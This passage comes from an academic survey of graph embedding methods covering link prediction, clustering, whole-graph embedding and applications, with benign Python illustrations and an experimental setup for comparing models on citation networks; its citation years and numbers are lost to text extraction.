networks and missing edges reconstruction in noisy network data. basically, it is a method to apply standard machine learning framework for graph data considering feature space consisting of pairs of nodes and their features. one of the interesting research questions is in the way of constructing edge embedding in a non-direct combination of node embeddings, as it was suggested in component-wise embeddings (grover & leskovec, ) or bi-linear combination of compressed node embeddings suggested in abu-el-haija, perozzi & al-rfou ( ). certain practical applications for drug combinations was suggested in zitnik, agrawal & leskovec ( ). harp chen et al. ( b) incorporates several hierarchical layers while transmitting information from edge embedding to node embedding. other systems of directly makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ incorporating edge features and labels were suggested in cane (tu et al., ) and lane (huang, li & hu, ). 
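as a concrete illustration of turning node embeddings into edge features for link prediction, the sketch below uses the component-wise (hadamard) operator popularized by node2vec and a logistic regression classifier. it assumes scikit-learn and numpy, and that positive (observed) and negative (sampled non-edge) node pairs have already been prepared.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score

def edge_features(embedding, pairs, op="hadamard"):
    """Build edge vectors from node embeddings (embedding: dict node -> vector)."""
    u = np.array([embedding[a] for a, _ in pairs])
    v = np.array([embedding[b] for _, b in pairs])
    if op == "hadamard":
        return u * v                       # component-wise product
    if op == "concat":
        return np.hstack([u, v])
    return (u + v) / 2.0                   # average, as a fallback operator

def link_prediction_auc(embedding, pos_train, neg_train, pos_test, neg_test):
    """Fit a logistic regression on edge vectors and report test ROC-AUC."""
    x_train = edge_features(embedding, pos_train + neg_train)
    y_train = np.array([1] * len(pos_train) + [0] * len(neg_train))
    x_test = edge_features(embedding, pos_test + neg_test)
    y_test = np.array([1] * len(pos_test) + [0] * len(neg_test))
    clf = LogisticRegression(max_iter=1000).fit(x_train, y_train)
    return roc_auc_score(y_test, clf.predict_proba(x_test)[:, 1])
```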
models of joint node and edge structure learning were proposed in dual-primal gcn (monti et al., ) and elaine (goyal et al., ). a model for embedding event graphs in which event is described by several edges was presented in hebe (gui et al., ). wu et al. ( ) presents random walk with restart index. phuc, yamada & kashima ( ) embeds several graphs with similar structural properties to boost link prediction accuracy. keser et al. ( ) employs skip-connections in vgae. link prediction models are applied in web linking (adafre & de rijke, ), social dating services (backstrom & leskovec, ) and paper recommender system for digital libraries (he et al., ). the reader can found an up-to-date survey in srinivas & mitra ( ). lpp was specifically formulated in liben-nowell & kleinberg ( ) based on nodes pairwise similarity measures. approaches for link prediction include similarity based methods (adamic & adar ( )), maximum likelihood models (clauset, moore & newman, ), and probabilistic models (getoor & taskar, ; heckerman, meek & koller, ). in tang & liu ( ), authors are suggesting unsupervised approach for lp problem. gao, denoyer & gallinari ( ), gao et al. ( ) suggested temporal link prediction based on matrix factorization technique and noise reduction in large networks. attribute-based link formation in social networks was studied in mcpherson, smith-lovin & cook ( ), robins et al. ( ), while deep learning approaches were presented in liu et al. ( ), zhai & zhang ( ) and berg, kipf & welling ( ). heterogeneous graph link prediction for predicting links of certain semantic type was suggested in liu et al. ( b, b). an evaluation of link prediction models based on graph embeddings for biological data was presented in crichton et al. ( ). two surveys on link prediction methods describing core approaches for feature engineering, that is, bayesian approach and dimensionality reduction were presented in hasan & zaki ( ) and lü & zhou ( ). survey on link prediction was published in wang et al. ( ). node clustering definition (node clustering or community detection or graph partitioning) is the task of the partitioning of a graph g(v, e) into several subgraphs gi(vi, ei) with a dense connection within groups and sparse connection between clusters. node clustering (also known as community detection in social network analysis) aims to find such a grouping (labelling) of nodes so that nodes in the same group are closer to each other rather than to the nodes from outside of the group (malliaros & vazirgiannis, ). no labels are provided on initial step due to unsupervised type of the problem. methods use attribute (zhou, cheng & yu, ) or structural information. the latter methods of graph clustering are usually based on either community detection (newman & girvan, ; fortunato, ) or structural equivalence (xu et al., ). in community detection (shi & malik, ; ding et al., ), the cluster is defined as makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dense subgraph with a high number of edges inside subgraph, and a low number of edges between subgraph and the rest of a graph. the general idea is to use node embeddings as a compressed representation of sparse graph adjacency matrix and then apply standard clustering algorithms, such as k-means or dbscan, for vectorized data (white & smyth, ; tian et al., ; cao, lu & xu, ; chen et al., b; cao, lu & xu, ; nie, zhu & li, ). 
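the sketch below illustrates this pipeline: k-means is run on the embedding matrix and the resulting partition is scored with the silhouette coefficient (in embedding space) and, assuming networkx, with graph modularity. the number of clusters is an illustrative choice, and embedding rows are assumed to follow the node order of the graph.

```python
import networkx as nx
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

def cluster_embeddings(graph, embedding_matrix, n_clusters=7):
    """K-means over node embeddings, scored by silhouette and graph modularity."""
    labels = KMeans(n_clusters=n_clusters, n_init=10, random_state=0).fit_predict(embedding_matrix)
    sil = silhouette_score(embedding_matrix, labels)
    # group nodes by cluster id (rows of embedding_matrix aligned with graph.nodes())
    communities = [
        {node for node, lab in zip(graph.nodes(), labels) if lab == c}
        for c in range(n_clusters)
    ]
    mod = nx.algorithms.community.modularity(graph, communities)
    return labels, sil, mod
```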
going further, joint optimization of clustering and node embedding was suggested in tang, nie & jain ( ), wei et al. ( ). efficient iterative community aware network embedding was proposed in wang et al. ( d) and several others (zheng et al., ; cavallari et al., ). teng & liu ( ) propose multi-objective evolutionary algorithm for community detection. zhang, shang & jiao ( ) use multi-objective matrix factorization over several shortest path graphs and utilizes (moea) to find community structure. salim, shiju & sumitra ( ) train the embeddings on different views for preserving many properties of a given network. quiring & vassilevski ( ) employs hierarchical coarsening of the graph to better extract clusters. subgraph (and graph) embedding while studying network embedding, one may think of a way to aggregate or generalize low-level node feature representation to the whole network representation, thus stating the problem of embedding the whole graph (song, ). such vector is required for the graph-level tasks like graph classification, similarity and clustering. it considers the whole network as one structural unit in the training dataset. the task is relevant to chemistry or biology domains (nikolentzos, meladianos & vazirgiannis, ; zhang et al., a; duvenaud et al., ; dai, dai & song, ; niepert, ahmed & kutzkov, ; kearnes et al., ). they can also be applied for graph reasoning (li et al., c) or computer vision tasks (bruna et al., ). in duvenaud et al. ( ), the sum based approach over network embedding was suggested. following by it, in dai, dai & song ( ), authors proposed neural network aggregation for constructing network embedding which is an argument for summing over subgraph nodes. improvement of these methods was later suggested in bronstein et al. ( ) based on approximations of spectral graph decompositions. ordered-based (niepert, ahmed & kutzkov, ) and fuzzy-based (kearnes et al., ) approaches based on aggregating features from convolutional approaches further improved subgraph embedding models. sun, hoffmann & tang ( ) maximize the mutual information between embedding and different graph substructures. the general approach of gilmer et al. ( ) as well as other convolutional approaches can be generalized by pooling-aggregation models or, as was suggested in scarselli et al. ( ), by adding super-node for whole graph embedding. the attention mechanism was applied to the graph classification task (lee, rossi & kong, ). definition (line (dual) graph) for a graph g = (v, e) defined as a set of vertices v and a set of edges e � v � v without loops and multi-edges we denote by g* = (v*, e*) a dual (line) graph the nodes of which are the edges of g and edges are nodes, in the makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sense that two adjacent nodes are connected by an edge if corresponding edges have a common node incident to them. in graph-level tasks, specific network properties play a major role. so vectors reconstructing sophisticated similarity metrics closely related to the problem of graph isomorphism was studied in several works (shervashidze et al., ; niepert, ahmed & kutzkov, ; mousavi et al., ; yanardag & vishwanathan, ; narayanan et al., ). gl vec (chen & koga, ) extends narayanan et al. ( ) model with edge features by utilizing the line graph. the works on matching node embedding and graph kernels were suggested in johansson & dubhashi ( ), nikolentzos, meladianos & vazirgiannis ( ). 
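the simplest whole-graph representation of this kind is a permutation-invariant readout over node embeddings, as in the sum-based approach mentioned above; a minimal sketch (assuming numpy and a per-graph node-embedding matrix) follows.

```python
import numpy as np

def graph_readout(node_embeddings, mode="sum"):
    """Aggregate a (n_nodes, d) node-embedding matrix into a single graph vector."""
    if mode == "sum":
        return node_embeddings.sum(axis=0)
    if mode == "mean":
        return node_embeddings.mean(axis=0)
    # concatenating several statistics is a common, slightly richer readout
    return np.concatenate([node_embeddings.sum(axis=0),
                           node_embeddings.mean(axis=0),
                           node_embeddings.max(axis=0)])

# the resulting graph-level vectors can be fed to any standard classifier
# for graph classification or clustering
```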
in donnat & holmes ( ) authors analyze graph-based distance methods for a temporal graph of bio-medical surveys. hierarchical clustering and fusion of different network representations were overviewed in yang & wang ( ). usually, this kind tasks require fusion of different similarity representations of a network as different graphs (serra, greco & tagliaferri, ; xue et al., ), preserving graph structure (hou et al., ) or simultaneously performing semi-supervised classification and clustering with adaptive knn model (nie, cai & li, ). different domain network clustering was suggested in cheng et al. ( ) and improved in the following works suggesting fusion of different not-synchronized networks with different structures (ni et al., ), cross-domain associations (liu et al., b) or multi-view spectral clustering (li et al., b). khasahmadi et al. ( ) propose a memory layer for graphs, that can efficiently learn graph hierarchical representations. tsitsulin, munkhoeva & perozzi ( ) propose an algorithm for efficient calculation of spectral distances for large graphs. kolouri et al. ( ) suggest the embedding preserving wasserstein distance with linear complexity. qin et al. ( ) presents one more graph pooling technique that uniformly aggregates neighborhood. baldini, martino & rizzi ( ) embeds maximal cliques to preserve structural similarities between graphs. yan & wang ( ) states the problem of transfer learning suggesting the framework for graph alignment and further adaptation learning for gnns. network visualization definition (graph visualization) is a way to map a graph to a low ( d, d) dimensional space. all nodes are either directly embedded as d vectors (le & lauw, ; wang, cui & zhu, ; cao, lu & xu, ; tu et al., ; niepert, ahmed & kutzkov, ; pan et al., ) or first embedded to certain dimension, and then compressed via pca (herman, melançon & marshall, ) or t-sne (maaten & hinton, ) (or other dimension reduction frameworks, see for, for example, tenenbaum, de silva & langford, , de oliveira & levkowitz, ) in order to plot in d space. if there are labels or communities representative for network dataset, the nodes are usually visualized with different colors for each label in order to verify whether similar nodes are embedded closer to each other. such models, as perozzi, al-rfou & skiena ( ), grover & leskovec ( ), tang et al. ( ), ou et al. ( ), wang, cui & zhu ( ) demonstrated proper makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performance on the task of network visualization for unsupervised graph embedding models. evaluation of graph embeddings for large structural data visualization can be found in tang et al. ( a). graph visualization techniques beyond planar mappings can be found in didimo, liotta & montecchiani ( ). network compression definition (network compression, simplification or sparsification) is a task of reducing the number of nodes and edges in a graph, for further efficient application of graph algorithms. the concept of network compression was first introduced in as feder & motwani ( ) under the idea of reducing the number of stored graph edges while achieving a faster performance of certain algorithms on graphs. the compression was made by grouping nodes and edges into partitions of bipartite cliques and then replacing these cliques with trees. 
similar ideas of dividing the graph into groups of nodes and edges and encoding them were proposed in several studies (pardalos & xue, ; tian, hankins & patel, ; toivonen et al., ). minimum description length (mdl) (rissanen, ) was used in navlakha, rastogi & shrivastava ( ) to construct graph summary adjusted with edge correction algorithm. graph embeddings support compact graph representation, reducing memory storage from o(|v| × |v|) to o(d × |v|), where embedding dimension d � n below was shown to be enough for qualitative network reconstruction for second-order preserving proximity models (e.g., link prediction), such as ou et al. ( ) and wang, cui & zhu ( ). they also suit for various graph optimization task providing useful tools for constructing graph-based heuristics (khalil et al., ). applications to real-world problems in this section, we are interested in how graph embeddings appear in many other computer science fields, in which graphs are not directly expressed in the data, but relations between the objects can be efficiently described by graphs, and so, graph embeddings. computer vision image classification can be solved with classic cnn models considering the images as a grid-like structure. recently, graph convolutional network models can take into account different neighboring relations, thus going beyond the nearest pixels as the only features for convolutions. especially interesting results were obtained for d shape reconstruction (monti et al., ) and video action recognition. there are four main ideas of using graph neural networks for computer vision tasks: working with the interaction of objects on video and images, feature similarity graph, label graph, that is, images with the same label are connected, and internal graph-structured image data. one of the main problems with cnn is that they should be deep enough to account interaction information between object, so chen et al. ( c) propose glore unit that applies gcns over interaction data. it helps to efficiently solve relational reasoning task. in makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wang et al. ( ) relation graph of image objects was built for localizing object instance from natural language expression. graph representation is also useful for representing in-label object interaction like in metric learning. it successfully applied to face clustering task (yang et al., ; wang et al., b). also such graph was exploited by kim et al. ( ) for few-shot learning classification. graph convolutions are widely used in skeleton-based action recognition. it applies different graph network models to human skeleton graph (shi et al., ; si et al., ; li et al., a). gnns are used for video tracking and classification tasks (zhang et al., a; gao, zhang & xu, ; zhong et al., ). natural language processing nlp is highly correlated to graph tasks. here similar sequential methods are used, while data have hierarchical structure from different views. in marcheggiani & titov ( ), authors assign semantic roles by encoding sentences with the graph convolutional network. in marcheggiani, bastings & titov ( ), zhao et al. ( ) graph convolutional network models were applied for machine translation. sevgili, panchenko & biemann ( ) use the wikipedia link graph between entities to improve the quality of entity disambiguation task on unstructured text data. 
graph models are widely used in nlp to extract syntactic and semantic information (luo et al., ; vashishth et al., ; veyseh, nguyen & dou, ). the main approach is to extract the dependency graph and learn node (word) embeddings using gcn. another approach is to examine each sentence as a complete graph with adjacency weighted by attention. graph neural networks also help in sequence tagging task, because it natively exploits information about the connection between different entities. zhu et al. ( ) propose the generated parameters gnn for the relation extraction task. it also builds a complete graph of entities in the sentence via encoding of the sentence with any sequence model. after that, gnn is applied to solve the node classification task. a prominent application of gnns is to encode dependency tree information. such an approach is exploited by guo, zhang & lu ( ), they apply graph attention models. sahu et al. ( ) also use dependency graph for relation extraction tasks, but their model accounts for inter-sentence dependencies. question answering, comment generation and dialog systems are highly dependent on domain knowledge-base. such knowledge-base usually can be depicted as knowledge graphs. banerjee & khapra ( ), kim, kim & kwak ( ) applies gnn to encode knowledge and account to it in these tasks. li et al. ( b) also use graph models based on news interaction graphs. the transformer-based language models (vaswani et al., ) works in a similar way to graph attention networks. it models a sentence as a complete graph and calculates new word representation weighting previous vectors with self-attention. the bert model (devlin et al., ) is a special case of transformer-based models. it learns the vector by predicting masked words. such tasks can be formulated as link prediction between context and masked words. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ knowledge graph completion knowledge graph embedding aims to learn vectors for entities and multi-dimensional vectors for entity relations. knowledge graph completion solves link prediction between entities in knowledge graphs thus predicting ordered triples of entity-relation-entity (lin et al., ). knowledge graph (kg) embedding presents a knowledge base as a collection of triples “head-relation-tail” and consider them training samples. structured embedding (bordes et al., ) learns two separate entity-relation representations for head and tail, while semantic matching energy (bordes et al., ), latent factor model (jenatton et al., ) and neural tensor network (socher et al., ) embed entities and relations, and use models to capture correlations between them. a survey on kg embeddings wang et al. ( a) considers translation-based models, such as transe (bordes et al., ), transh (wang et al., ), transm (fan et al., ), transr/ctransr (lin et al., ), transc (lv et al., ), transd (ji et al., ), transparse (ji et al., ), kg e (he et al., ), and semantic matching models, based on rescal (nickel, tresp & kriegel, ) tensor factorization framework, such as distmult (yang et al., ), hole (nickel, rosasco & poggio, ) and complex (trouillon et al., ) with comparison paper for the latter two in trouillon & nickel ( ). question answering via knowledge graph embeddings was suggested in huang et al. ( ). weighted attention for supporting triple in kg link prediction problem was presented in mai, janowicz & yan ( ). data mining ye et al. 
( ) proposed method that models relations between different entities in android logs (api, apps, device, signature, affiliation) using a hierarchical graph. then they classify nodes of such graphs for real-time malware classification. graph neural networks are widely used to utilize the social network information. wu et al. ( a), song et al. ( ), chen et al. ( a) use such models to account for social effects in recommender systems. zhang, ren & urtasun ( ) propose graph hypernetworks for neural architecture search. it learns topology of architecture and infers weights for it. recommender systems the basic approach for recommending top k nodes of interest for a given node is usually based on certain similarity metric (pirotte et al., ; zhao et al., ; gui et al., ; zhou et al., ; ou et al., ). there are various situations in which one need to provide node recommender system zhang & wang ( ), in particular, for items to customers via app model (zhou et al., ), documents matching a given query (xiong, power & callan, ), community-based question answering (zhao et al., ; fang et al., ), music recommendations via user preference embedding for query answering (chen et al., a, a), location recommendations (xie et al., ), and many other real-world scenarios. matrix completion approach based on graph embeddings was provided in monti, bronstein & bresson ( ). large scale recommender system was presented in ying et al. ( a). explainable recommendations were studied in zhang & chen ( ). makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in zhang, wang & zhang ( d) authors represents product search as a graph of co-clicked answers. they mix network embedding, term item vectors and term query vector using mlp to predict the probability of click on the item in certain query. this score is used to rank products. star-gcn (zhang et al., c) is used over user-item interaction graph to learn user and item vectors. this approach is also suitable for inductive learning only using several interactions of users and items. this helps to solve the cold-start problem in recommender systems. shang et al. ( ) use graphs for encoding hierarchical structure of health diseases. next, achieved embeddings are integrated into bert model for visit-based user recommendation. the classical specific case of using network science in recommendations is the link prediction in collaborator networks (chen, li & huang, ; liu & kou, ; li & chen, ; cho & yu, ). kong et al. ( ) developed a scientific paper recommender system based on citation networks, which uses text information embeddings to find papers of similar research interest and structural network embedding. the combined embedding model was then applied for constructing article vector representations. a combination of network and knowledge graphs was proposed in yang, tang & cohen ( b). in makarov et al. ( a, b, c) authors show that two-level architecture can improve the recommendation results. firstly it predicts the collaboration itself and further estimates its quantity/quality. a survey on co-authorship and citation recommender systems may be found in ortega et al. ( b). biomedical data science the large variety of data in biomedicine can be represented as networks. le, yapp & yeh ( ) applies embedding techniques to electron transport chains. do, le & le ( ) utilizes it for detection of specific proteins. lin et al. 
( b) exploits the dynamic graph embedding for detecting changes in functional connectivity in the brain network. computational drug design is an attractive direction because it reduces the costs of development of new drugs. the prominent field is drug repositioning. it usually works with networks of drug interaction with other entities: target, disease, gene or another drug. the main idea of such task is to predict possible relations between drug and other entities su et al. ( ). for example, drug-disease interaction networks can predict the possible treatment of new disease with existing drugs. so, it is a similar statement to the link prediction problem. yamanishi et al. ( ), cobanoglu et al. ( ), ezzat et al. ( ) find drug-target pairs via proximity over matrix factorization based embeddings. zheng et al. ( ), yamanishi et al. ( ), ezzat et al. ( ) try to add external data to the drug-interaction network embeddings. luo et al. ( ), zong et al. ( ), alshahrani et al. ( ) build heterogeneous networks of different drug-related interaction and apply network embedding methods to it. wang et al. ( a) embeds heterogeneous gene graph to predict drug response. another important field in medicine design is the adverse drug reaction (adr) analysis. some articles (zitnik & zupan, ; zitnik, agrawal & leskovec, ) focus on similar drug–drug and drug–target interaction prediction. wang ( ), abdelaziz et al. ( ) makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ use the knowledge graph based on biomedical texts. stanovsky, gruhl & mendes ( ) also works with kg embedding, but over adrs mentions in social media. network science is also applied to the molecule structure. li et al. ( b) proposes a prediction of pathogenic human genes using network embedding. network embedding is very popular method in protein–protein interaction assessment and function prediction (kulmanov, khan & hoehndorf, ; su et al., ; wang, qu & peng, b). shen et al. ( ) and li et al. ( a) applies to mirna-disease interaction network to associate genes with complex diseases. the detailed survey of biomedical network embedding applications is presented by su et al. ( ). reinforcement learning reinforcement learning (rl) is a popular approach to solve combinatorial optimization problems. zheng, wang & song ( ) provides the open-sourced environment for graph optimization problems using reinforcement learning and graph embeddings. hayashi & ohsaki ( ) use rl for a similar task, such as binary topology optimization of trusses. it utilizes graph convolution networks for feature extraction and further usage in rl optimization. a similar concept was used in yan et al. ( ) to solve automatic embedding problem using actor-critic models for optimization and graph embeddings for representation learning. waradpande, kudenko & khosla ( ) suggests encoding states in markov’s decision process with graph embedding models. lin, ghaddar & nathwani ( a) follows this idea and utilizes gnn for parametrization of the stochastic policy in electric vehicle routing problem. zhou et al. ( ) solves the interactive recommender system problem enhancing it with knowledge graphs. it describes states using gcn over knowledge graph. open problems here we mention the most interesting open problems in graph representation theory, which are far from good results applicable for any given scenarios. many real-world graphs are dynamic: nodes and edges can appear and vanish over time. 
despite a large number of recent papers, this field is far from benchmark well-performing models as of now. one of the approaches for it is inductive learning, which is strongly correlated with graph dynamics problem. inductive methods allow finding embedding for newly added nodes without refitting the whole model. it is important in real-world applications and partially solve the scalability issue. edge attributes aware network embedding is poorly studied field. there is a low number of models. such models usually depend on a line graph, which has a dramatically larger number of nodes. so such models have a problem with scalability. edge attributes are important in such tasks as context-aware recommender systems or transportation networks optimization. they are an only little number of works about subgraph embedding. such models should represent complex structures like triangles or hierarchy. the application of non-euclidean spaces to the embedding task is a promising method solving this issue, but also poorly studied. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recent advances in the distributed and batch training for graph neural networks looks promising. however, most of the methods are not theoretically grounded, so it could be hard to understand the issues of poor quality of results. only zeng et al. ( ) provides some bias-variance analysis of node and edge sampling approaches. however, akyildiz, aljundi & kaya ( ) provides a much faster and powerful method for large scale embedding. another field that is currently under the control of many papers is the heterogeneous graph embedding. such graphs are very common in real-world scenarios. the graph attention-based methods look promising in that field. it allows us to catch different aggregation levels like in fu et al. ( ) and li et al. ( b). as can be seen from our survey, most embedding models catch specific graph attributes and there is no general model, thus, raising a problem of selection and recommendation of different models for specific use-cases. it is also an interesting point to develop meta-strategies for embedding mixture, that will preserve different graph properties. such meta-models could solve the problem of knowledge generalization and reduce costs for deploy of application. as in the other fields like nlp and cv, graph neural networks are poorly interpretable, apart from an initial study in ying et al. ( ). these and many other research questions lead to a vast amount of open research directions, which will benefit the field and lead to many applications in other computer science domains. in our study, we focus on another interesting question regarding the fact that there are almost no general studies that compare the performance of models based on graph properties, most of the models are created for specific graph use-case. below, we provide our insights on real-world networks as well as interpretations on such findings. model comparison this paper focuses on the four most popular tasks on graphs: node classification, link prediction, node clustering and network visualization. these tasks cover most of the real-world applications, in which a graph is used to unify information on nodes and their properties. 
data
we use four benchmark datasets for comparison of different models: cora (sen et al., ), citeseer (lim & buntine, ), the hse coauthor network (makarov et al., ), and the microsoft academic graph computer science (mag cs) dataset (sinha et al., ). the first two datasets are citation networks; this type of network is very common for evaluating the quality of network embeddings. these datasets are also convenient for model comparison because they have an interesting label and feature structure. the last dataset is a co-authorship network; it has heterogeneous edges and a large size. general purpose graph embedding models work only with homogeneous graphs, so we merge all the edges between a pair of nodes into one edge. a brief overview of the dataset statistics is provided in table .
table : datasets description (assortativity, label modularity, #nodes, #edges, #features and #classes for cora, citeseer, hse, and mag cs).
metrics
we use standard classification metrics for the node classification and link prediction tasks.
- accuracy is the rate of right answers of a classifier.
- precision is the rate of true positive answers relative to the number of all positive answers of a classifier.
- recall is the rate of true positive answers relative to the number of all positive examples in the data.
- f1 is the harmonic mean of precision and recall.
- area under the roc curve shows the probability that a random negative example sampled from a uniform distribution is ranked lower than a randomly sampled positive one.
- average precision is the average of all possible precision values weighted by the recall for different probability thresholds.
we calculate the standard deviation with the following procedure:
1. generate a subsample of the data with % of the volume of a given dataset.
2. train the model on it.
3. estimate the quality of the trained model on the test set.
4. repeat the previous steps nine more times.
the described bootstrap (efron, ) procedure allows one to easily calculate the standard error and confidence intervals for any statistic. confidence intervals are required to understand the significance of the difference between models. node clustering was evaluated with two metrics: the silhouette coefficient and modularity.
- the silhouette score shows the average similarity between each example and its cluster in comparison with the closest other cluster, so it measures the overall cluster separation relative to the distance measure. in our study, we use the euclidean distance.
- the modularity score works similarly, but for computing inter- and intra-cluster quality it measures the density of connections between clusters relative to the density inside clusters.
we also evaluate the quality of node clustering and network visualization with a visual comparison of how clusters are grouped in the umap (mcinnes, healy & melville, ) projection of embeddings. umap (uniform manifold approximation and projection) is a dimensionality reduction technique based on topology and riemannian geometry. first, it builds a weighted nearest-neighbors graph according to the elements' feature vectors (embeddings). then, it initializes the layout using spectral embedding and optimizes it with sgd minimizing a fuzzy-set cross-entropy. umap works much faster than t-sne and gives at least the same quality of projection.
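a minimal sketch of this visual check is given below: embeddings are projected to 2-d with umap and colored by node labels. it assumes the umap-learn and matplotlib packages; the hyperparameters are library defaults rather than the settings used in the experiments.

```python
import matplotlib.pyplot as plt
import umap

def plot_embedding(embedding_matrix, labels, title="umap projection"):
    """Project node embeddings to 2-d with UMAP and color points by class label."""
    proj = umap.UMAP(n_components=2, random_state=42).fit_transform(embedding_matrix)
    plt.figure(figsize=(6, 6))
    plt.scatter(proj[:, 0], proj[:, 1], c=labels, s=5, cmap="tab10")
    plt.title(title)
    plt.show()
```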
interpretation of the resulting plot is simple: similar samples in the initial space (e.g., nodes with the same labels) should lie close to each other in the 2-d plane.
evaluation pipeline
the node classification task is a native multi-class classification problem. the link prediction task can also be solved as classification, but with two classes depicting edge existence. the basic approach to validating such methods is to use a held-out sample, so before any model is trained we create a train-test split for all the datasets in order to compare all models on the same subsets. we use a simple % test, % train random split for node classification, following other papers on graph embeddings. the problem with link prediction is that the described graphs are highly imbalanced, because there are many more unconnected node pairs than edges. a large imbalance leads to poor training, because even a simple constant prediction will give high scores. one of the methods for handling this problem is to under-sample the larger class. to keep the classification task harder, it is convenient to use a negative sampling technique: we select the most similar pairs of nodes which are not connected, in the same amount as the existing edges. the proximity metric used is cosine similarity, which is a normalized dot product of feature vectors; for the features, we use the adjacency matrix. because basic classification models do not work with discrete graph data, after constructing the train and test samples we need to generate meaningful features. here we use unsupervised graph embeddings ( dimensions, as commonly used in different papers and surveys). graph neural networks were also trained in an unsupervised way with a reconstruction loss over the graph adjacency matrix. the reconstruction loss is calculated as the binary cross-entropy between the adjacency matrix and its estimation obtained by inner-product decoding from the embedding matrix. now, we can solve downstream tasks like classification or clustering. for that part, we use three different classifiers: logistic regression (lr), random forest (rf) and gradient boosting (gbm). logistic regression is a linear model: it calculates a weighted sum of object features and normalizes it with a sigmoid to obtain a probability. linear models are fast, interpretable and easily tunable because of their simplicity. random forest is an ensemble of decision trees built on subsamples bootstrapped in both dimensions, features and observations. gradient boosted machines are another approach to learning a decision tree ensemble: each next tree is fitted by sequential optimization of the previous learner's error term. the main advantage of tree-based models is that they can recover non-linear dependencies, but for this flexibility we pay with a strong dependence on hyperparameter selection. the scikit-learn implementations with default hyperparameters were used. for link prediction, we simply concatenate node vectors to obtain an edge embedding. for clustering, we use the k-means model from scikit-learn.
remark. the common way to use graph neural networks is semi-supervised training. such an approach gives a bias towards these models, because the embedding learns not only the graph structure and feature transformations but also supervised information about the labels.
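the unsupervised reconstruction objective mentioned above can be written in a few lines. the sketch below (numpy only, untrained, with a toy adjacency matrix) shows the inner-product decoder and the binary cross-entropy loss; the actual gradient-based training of the encoder would be left to a deep learning framework.

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def decode(u):
    """GAE-style inner-product decoder: A_hat = sigmoid(U U^T)."""
    return sigmoid(u @ u.T)

def reconstruction_loss(a, u, eps=1e-9):
    """Binary cross-entropy between the adjacency matrix and its reconstruction."""
    a_hat = decode(u)
    return -np.mean(a * np.log(a_hat + eps) + (1 - a) * np.log(1 - a_hat + eps))

# illustration: u could come from any encoder, e.g. the gcn_forward sketch above
a = np.array([[0, 1, 1], [1, 0, 0], [1, 0, 0]], dtype=float)
u = np.random.rand(3, 8)
print(reconstruction_loss(a, u))
```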
so we train graph neural networks in an unsupervised way because our study is aimed to understand how different properties of embedding models can help in considered tasks. models we select several models of different types mentioned in “methods for constructing graph embedding” that preserve different properties of a graph. the general idea is to compare models of different fitting approaches with respect to network properties. matrix factorization based models: � grarep is symmetric and preserves high-proximity. the default k-hop order is , the number of svd iterations is , a random seed is . � hope directly models asymmetric similarities. � m-nmf preserves community structure. the default number of clusters is , clustering penalty is . , modularity regularization penalty is . , similarity mixing parameter is , the number of power-iterations is , early stopping step is . random-walks based models: � node vec is a baseline for sequential methods which efficiently trade-offs between different proximity levels. the default walk length is , the number of walks per node is , return hyper-parameter is , in-out hyper-parameter is . � diff vec use diffusion to sample random walks. the default number of nodes per diffusion tree is , the number of diffusions per source node is , context-size is , the number of asgd iterations is , the learning rate is . . � walklets allow to model different levels of community structure and generalize grarep model. default random walk length is , the number of random walks per source node is , the window size is , the minimal number of appearances is , the order of random walk is first, return hyper-parameter is , in-out hyper-parameter is . � gemsec directly cluster nodes. default random walk length is , the number of random walks per source node is , the window size is , the minimal number of appearances is , the order of random walk is first, return hyper-parameter is , in-out hyper-parameter is , distortion is . , negative samples number is , the initial learning rate is . , annealing factor for learning rate is , initial clustering weight coefficient is . , final clustering weight coefficient is . , smoothness regularization penalty is . , the number of clusters is , normalized overlap weight regularization. deep learning models: � gcn is a baseline for deep learning models. the default number of epochs is , dropout is . , the learning rate is . , weight decay is . , the number of hidden layers is . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � graphsage (gs) improves gcn by reducing the number of neighbors while weighting the node vectors. the dropout is . , aggregation is gcn, the number of epochs is , the learning rate is . , weight decay is . . � gat utilizes an attention mechanism. the number of epochs is , in-dropout is . , attention dropout is . , the learning rate is . , the negative slope is . , weight decay is . , the number of hidden layers is . results the current section has the following structure. we start the analysis from node clustering tasks because it also helps to understand the performance of graph embeddings on the other tasks. further, we describe node classification task and link prediction followed by network visualization. we also conducted experiments on random graphs to study the difference of graph embeddings on real-world networks and simulated ones. node clustering the results on the node clustering task are presented in table . 
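before walking through the table, here is a minimal sketch of how the two reported clustering metrics can be obtained from an embedding matrix; it assumes a networkx graph `G` with nodes numbered 0..n-1, an embedding matrix `emb` and a chosen number of clusters (all names illustrative).

```python
# Sketch: silhouette and modularity of a k-means clustering of node embeddings.
# `G` is a networkx graph with integer nodes 0..n-1, `emb` an (n, dim) array.
import networkx as nx
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

def clustering_quality(G, emb, n_clusters):
    cluster_of = KMeans(n_clusters=n_clusters, n_init=10).fit_predict(emb)
    silhouette = silhouette_score(emb, cluster_of, metric="euclidean")
    communities = [{v for v in G.nodes if cluster_of[v] == c}
                   for c in range(n_clusters)]
    modularity = nx.algorithms.community.modularity(G, communities)
    return silhouette, modularity
```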
